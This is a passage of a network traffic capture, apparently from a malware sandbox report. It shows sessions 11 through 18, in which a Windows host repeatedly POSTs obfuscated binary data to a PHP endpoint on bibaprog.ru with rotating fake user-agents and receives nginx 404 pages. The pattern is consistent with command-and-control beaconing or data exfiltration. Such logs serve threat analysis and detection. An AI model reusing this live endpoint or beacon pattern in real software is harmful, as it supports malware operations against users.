Jan 13, 2025 13:38:52.373850107 CET	1023	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:38:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Llc2qZbjFiVUanQLRGl8Se%2BsicWC%2FF%2FIwN32rA%2BYoF1NohCdAHVGUJrYypBacgeRPLmXfOGnzknHe3QnsHOjq5fSxdZYfHV%2FX5Wd%2FGayNj3LelB%2FzaVyUAJ4HKaH%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015721fae494414-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3979&min_rtt=1715&rtt_var=5171&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=73629&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.5	49986	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:02.578071117 CET	282	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:02.967264891 CET	344	OUT	Data Raw: 00 03 01 02 06 0f 01 05 05 06 02 01 02 03 01 02 00 04 05 0c 02 01 03 0f 07 0f 0c 0c 03 04 03 55 0f 54 06 09 00 53 05 04 0d 03 02 0a 05 0b 06 02 06 06 0c 0a 0e 06 05 01 07 0f 07 05 05 02 04 0f 02 53 0f 5a 05 52 05 51 0b 01 0d 04 0c 04 0e 53 04 0c Data Ascii: UTSSZRQSRSW\L~k^TOcrybepkoec\|c^~chyooJ{iYknlcY]}e~V@xmT~bS
Jan 13, 2025 13:39:03.049335003 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:03.282569885 CET	1017	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q0KkWIaKNGgig5Wjcbg1Kk%2BNj%2BiRSeqQhzumS6Tc6LCwq%2BS6%2Bp4SRkQbK%2Bgm5YLrg87jgxPvU6egWH2S5duCFIk1dC69hzT9ckXDsQ3pMnex0gnBubLHI9rYvjV2Wg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90157263b8eede95-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3657&min_rtt=1750&rtt_var=4470&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=85841&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.5	49987	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:09.392708063 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: bibaprog.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:09.740566969 CET	336	OUT	Data Raw: 05 07 04 07 03 0b 04 05 05 06 02 01 02 05 01 07 00 01 05 0e 02 0d 03 0c 01 0f 0a 05 07 01 00 07 0d 53 04 0d 07 0c 04 0a 0b 05 06 00 06 06 07 54 07 03 0e 5c 0a 02 06 56 01 07 07 04 04 52 04 0a 01 03 0c 0d 05 52 04 54 0e 57 0b 04 0a 00 0d 04 05 03 Data Ascii: ST\VRRTWRSV\L~\|`PM`Ln_vKh\|By`o\|Bc\|l\|glNrS]Pw^}_~V@xSn~uy
Jan 13, 2025 13:39:09.835675955 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:10.062700987 CET	1012	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8w2RbbRnkDk0NXQqvdq85upWQ2D3wA69CfGbiTJaBUOiemx9c1PbjQ7iEbQpfZKi5AhzJQ30Qaa3T%2BLYYe54NYP1cOwAU3ZlWRdUHecWZYGTISZ1DkSaS1Jew5pYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015728e3944de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4126&min_rtt=1626&rtt_var=5611&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=67492&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49988	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:20.575989008 CET	294	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:20.928175926 CET	344	OUT	Data Raw: 05 00 01 05 06 01 01 01 05 06 02 01 02 04 01 06 00 03 05 0e 02 03 03 0b 00 01 0a 01 04 53 03 04 0c 03 04 5e 02 51 07 0b 0c 57 05 04 00 04 07 01 06 06 0d 0c 0f 07 04 06 07 57 04 00 06 06 04 0e 00 53 0d 5a 00 07 06 06 0d 0f 0c 0e 0a 07 0c 02 06 0d Data Ascii: S^QWWSZU\L~N`btbyuKUUkoetB^B``{oxZo`fI}ml@twRNj_~V@@{mv~L}
Jan 13, 2025 13:39:21.021404028 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:21.256438017 CET	1009	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2UikfKH73w4wsury6Wo2Pn5VM8G6KS9GfnQEJcsPVjkeyx91ReB5i4tiCE6QVO6YeQ9pN7mAitaK2nrvIFA9vXoeUvHLyMNpmlwr%2BZoyehEjxI0kLUE6cMdZB5QJg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901572d4192dc358-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1547&rtt_var=661&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=780748&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49989	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:31.460133076 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:31.818763018 CET	344	OUT	Data Raw: 00 05 04 03 06 00 01 00 05 06 02 01 02 06 01 02 00 07 05 0a 02 0d 03 0b 02 54 0e 07 06 04 00 09 0f 55 07 0b 03 03 05 02 0c 50 04 0a 05 56 06 04 03 0a 0b 0f 0d 0e 06 57 06 07 05 04 06 06 07 0e 02 01 0a 0d 06 0f 04 02 0e 03 0f 57 0e 01 0b 06 04 05 Data Ascii: TUPVWWR]TQ\L}Q~`TO`\T^ufkPv\w\~`tIxoxpX\|~\|AtgZe~V@BxmfOb}
Jan 13, 2025 13:39:31.942730904 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:32.165982008 CET	1020	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2%2F%2By1X8Ky15NfN%2B4w3agwdSGhC%2BZsJtHKUUlCR0JKGfnG9qDoe4A1bRXz69HouDla70EgjHjctqQE2ENho0I2zlbu4cCbB21xLeRwqFUsklO1Q0WTF9z7zKBE%2Bc8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90157318493c8ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3889&min_rtt=1965&rtt_var=4586&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=84082&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.5	49990	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:42.406017065 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: bibaprog.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:42.756401062 CET	336	OUT	Data Raw: 05 07 04 07 03 0b 04 05 05 06 02 01 02 05 01 07 00 01 05 0e 02 0d 03 0c 01 0f 0a 05 07 01 00 07 0d 53 04 0d 07 0c 04 0a 0b 05 06 00 06 06 07 54 07 03 0e 5c 0a 02 06 56 01 07 07 04 04 52 04 0a 01 03 0c 0d 05 52 04 54 0e 57 0b 04 0a 00 0d 04 05 03 Data Ascii: ST\VRRTWRSV\L~\|`PM`Ln_vKh\|By`o\|Bc\|l\|glNrS]Pw^}_~V@xSn~uy
Jan 13, 2025 13:39:42.854703903 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:43.074819088 CET	1019	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P46V3VI57W%2Bu5JlrrGPJA9F4bpK38D01x1sJyT90iJPlfkDYXE2PuMsGdxSg6gjhbiJxKWHL6cJAD1h%2FmlWtkTzLUuKVXs%2FEEHXuGvnDh4%2F0ZXBNVKUDlTxF5S3l5w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9015735c8819de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7927&min_rtt=1662&rtt_var=13155&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=28191&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.5	49991	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:39:53.952670097 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:39:54.303354979 CET	344	OUT	Data Raw: 00 03 01 05 03 0a 01 06 05 06 02 01 02 04 01 05 00 0b 05 09 02 00 03 0e 07 03 0d 04 03 01 00 07 0f 04 06 0f 02 53 07 06 0f 07 04 02 06 04 07 01 07 04 0c 5d 0f 57 07 01 06 01 07 05 07 0b 00 09 01 53 0d 09 04 0e 05 04 0e 52 0f 05 0f 04 0f 04 02 03 Data Ascii: S]WSRSTV\L}T\|NjvqrXuuhojXcl`L\|cQXlUp_{NTD~\|CcdwZj_~V@@{SPN~ri
Jan 13, 2025 13:39:54.396323919 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:39:54.547436953 CET	1023	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:39:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo4ZQVYAP3x8MiYnm%2FSCsFy%2BDzyY2mrgWLJqntSZA%2BnvV%2FZvC0l9wet0Knm9r4YVyAcGoYiPQBvRZIfZBY77j%2FSOLavmeybH6EHMYiLpJadSCgLKbzWw%2BPHTO5IV4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901573a4b99c4414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8473&min_rtt=1701&rtt_var=14183&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=26125&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	49992	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:05.027635098 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:05.381364107 CET	344	OUT	Data Raw: 00 04 04 06 03 0a 04 07 05 06 02 01 02 0c 01 02 00 04 05 0b 02 05 03 01 02 05 0e 05 04 55 03 07 0c 0e 06 5e 01 06 06 05 0c 57 05 0b 00 0a 05 01 05 05 0b 0d 0c 01 04 56 06 53 03 07 05 06 00 01 02 03 0c 09 05 04 01 04 0f 07 0c 05 0a 0d 0e 09 06 01 Data Ascii: U^WVST]\L~Ak^jc[uukRB}BvwYkstIolUxpX\|SStwlNj_~V@xmTL}b[
Jan 13, 2025 13:40:05.481450081 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:05.719983101 CET	1020	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APr2lqU7VFkZCQUc%2Fee7yWvt1P3VmVd%2B9faIEMd8rBdhmzzcV4XOSrwpg%2BJFm4JVjiU%2FQ0gxzg84nVcwEAeSAnN2uf72ewTQC7ERT66jwm5XM2WDdFcURqkOaCfIpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901573e9fb197c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10020&min_rtt=1905&rtt_var=16944&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=21848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	49993	104.21.64.1	80

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:40:11.839567900 CET	347	OUT	POST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: bibaprog.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:40:12.193876028 CET	344	OUT	Data Raw: 00 06 01 00 03 08 01 04 05 06 02 01 02 07 01 01 00 00 05 0f 02 0c 03 0e 03 03 0e 00 07 03 01 07 0f 53 03 08 00 57 06 0a 0e 00 05 53 06 53 06 0f 06 01 0c 59 0e 03 05 01 06 57 06 01 01 00 07 0e 03 53 0a 0d 07 0e 04 55 0b 02 0c 55 0c 01 0b 06 06 07 Data Ascii: SWSSYWSUUQQ\L~@`Tcr}LvulBywhBk`kYylt[zpaX}m``Y\|e~V@AxSzri
Jan 13, 2025 13:40:12.296238899 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:40:12.525507927 CET	1024	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 12:40:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCCqGn9HDvQOcZ5nbd3uYz%2Fopg%2FkcFT%2FKqZEn5Higo66NQQWldB%2FvvNLtMYF%2BDfTQAkA%2FqFlQye9Rjy9z0QEANI7lt5Jim3xfqyT8KevqoeqrTwjt8lnok6N%2FW4oCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901574149ab34414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3487&min_rtt=1749&rtt_var=4133&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=93231&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 